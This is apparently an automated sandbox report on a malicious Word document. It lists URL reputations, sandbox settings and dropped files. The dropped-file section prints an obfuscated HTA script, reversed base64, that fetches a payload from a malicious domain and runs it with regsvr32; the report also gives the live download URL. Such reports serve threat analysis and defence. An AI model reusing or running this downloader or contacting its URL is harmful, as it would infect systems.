http://airloweryd.com/adda/CzJsZLz8s7e1PAiOuESLghxyuWpr1A46cHBNR/dmIczx3VCKJVxOIM45tzrpZTl8IQ06/ryme0%Avira URL Cloudsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%VirustotalBrowse
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
airloweryd.com
unknown
unknowntrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
    high
    https://login.microsoftonline.com/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
      high
      https://shell.suite.office.com:1443CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
          high
          https://autodiscover-s.outlook.com/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
              high
              https://cdn.entity.CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                    high
                    https://powerlift.acompli.netCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                      high
                      https://cortana.aiCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                high
                                https://api.aadrm.com/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                      high
                                      https://cr.office.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                          high
                                          https://graph.ppe.windows.netCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptioneventsCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.netCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplateCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplateCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetectCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.msCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groupsCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                          high
                                                          https://graph.windows.netCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://airloweryd.com/adda/CzJsZLz8s7e1PAiOuESLghxyuWpr1A46cHBNR/dmIczx3VCKJVxOIM45tzrpZTl8IQ06/rymemshta.exe, 00000004.00000003.217326117.0000000006833000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.220229050.000000000AE93000.00000004.00000040.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/apiCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetectCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.jsonCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspxCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                  high
                                                                                  https://management.azure.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                    high
                                                                                    https://wus2.contentsync.CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://incidents.diagnostics.office.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                      high
                                                                                      https://clients.config.office.net/user/v1.0/iosCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                        high
                                                                                        https://insertmedia.bing.office.net/odc/insertmediaCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                          high
                                                                                          https://o365auditrealtimeingestion.manage.office.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                              high
                                                                                              https://api.office.netCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                high
                                                                                                https://incidents.diagnosticssdf.office.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                  high
                                                                                                  https://asgsmsproxyapi.azurewebsites.net/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                    high
                                                                                                    https://entitlement.diagnostics.office.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                      high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                        high
                                                                                                        https://substrate.office.com/search/api/v2/initCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office365.com/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                high
                                                                                                                https://webshell.suite.office.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                      high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/importsCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus.pagecontentsync.CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/macCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://api.cortana.aiCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.comCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devicesCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorizeCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://staging.cortana.aiCBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

                                                                                                                                                Contacted IPs

                                                                                                                                                No contacted IP infos

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                Analysis ID:452438
                                                                                                                                                Start date:22.07.2021
                                                                                                                                                Start time:11:06:40
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 5m 8s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:order_07.21.doc
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:28
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal96.expl.evad.winDOC@9/12@2/0
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .doc
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 40.88.32.150, 23.211.6.115, 168.61.161.212, 52.109.88.177, 52.109.8.25, 52.109.8.22, 104.43.193.48, 20.82.209.183, 23.211.4.86, 40.112.88.60, 173.222.108.226, 173.222.108.210, 80.67.82.235, 80.67.82.211, 20.50.102.62
                                                                                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                • Execution Graph export aborted for target mshta.exe, PID 5968 because there are no executed function
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                11:07:30API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                No context

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\ProgramData\captionEx.hta
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3039
                                                                                                                                                Entropy (8bit):5.8499136819223425
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:yAmqAXYLXHqiJXzatwLgXa/1CTaToY/353YaMr8SSjAG75XltCuxa5tD8tlsHsuH:l6YTlhza+gXataeoY/J3YaMrAl7da5t9
                                                                                                                                                MD5:111964AF02201E77AD219F7562BF19B2
                                                                                                                                                SHA1:9A48E4281A89383FF5AF45EE2F2BF710704E5152
                                                                                                                                                SHA-256:FB2A3EB78EF18021BD6DA3398FB8D935FD3884F418DDA72FC123903501B5B503
                                                                                                                                                SHA-512:141C2DAC7594678BC7DA7DE7E9DFC4E90A6A6B4E5EE5985B03F37E97827B59E0BBB6509D88AB6A3CF129DE2EB1660B90FB953F2ABCE441F5D37154D2F3C34784
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <html>.<body>.<div id='integerSwap'>fX17KWUoaGN0YWN9O2Vzb2xjLnlyZXVRdHNldXFlcjspMiAsImdwai54RW5vaXRwYWNcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLnlyZXVRdHNldXFlcjspeWRvYmVzbm9wc2VyLmV0ZWxlRHljbmVycnVDeXBvYyhldGlydy55cmV1UXRzZXVxZXI7MSA9IGVweXQueXJldVF0c2V1cWVyO25lcG8ueXJldVF0c2V1cWVyOykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHlyZXVRdHNldXFlciByYXZ7eXJ0eykwMDIgPT0gc3V0YXRzLmV0ZWxlRHljbmVycnVDeXBvYyhmaTspKGRuZXMuZXRlbGVEeWNuZXJydUN5cG9jOyllc2xhZiAsInJhS3BVS3Z5PWVtaXQmek5TS2d4WTNVUFpjaUI9ZmVyJmdrN1NJZkg4bGJLZjVHVXZrTGxHWlo9ZGkmbDhyRnBqM1phb0ptYjJKYT1lZ2FwJmtCNGtmeGlaUFJJNnRBcj1kaSZiajVTM3RuMEpjbUY9ZGlzJm9DPXhjRT8xc2VteXIvNjBRSThsVFpwcnp0NTRNSU94VkpLQ1YzeHpjSW1kL1JOQkhjNjRBMXJwV3V5eGhnTFNFdU9pQVAxZTdzOHpMWnNKekMvYWRkYS9tb2MuZHlyZXdvbHJpYS8vOnB0dGgiICwiVEVHIihuZXBvLmV0ZWxlRHljbmVycnVDeXBvYzspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGV0ZWxlRHljbmVycnVDeXBvYyByYXY=aGkhOykiZ3BqLnhFbm9pdHBhY1xcY2lsYnVwXFxzcmVzdVxcOmMgMjNydnNnZXIiKG51ci5ITGxhdjspInRjZWpib21ldHN5c2VsaWYuZ25pdHBpcmNz
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CBF1CA16-CFEE-4693-AD36-1F153D41DA8A
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):135461
                                                                                                                                                Entropy (8bit):5.362882415859654
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:XcQIKNgeBTA3gBwlnQ9DQW+z2Y34ZliKWXboOidXqE6LWME9:byQ9DQW+zaX31
                                                                                                                                                MD5:762DC9C29DD23B5A30037C3C7EDDA94B
                                                                                                                                                SHA1:ABA92C1F886C3935F939DEA431C7EC9A6996CDBB
                                                                                                                                                SHA-256:50FD9ABBC9121907A06AEFECC78B28C97CCE19AE7117A9ABF53F0C20CAE56F87
                                                                                                                                                SHA-512:59C1C26F82E9DCB14DA1465566096B50981955881C0031809667B798C72A3357B98459C40497607B916DF9ACE916F3A2BA634F22ED912EAD8950060E169AA84F
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
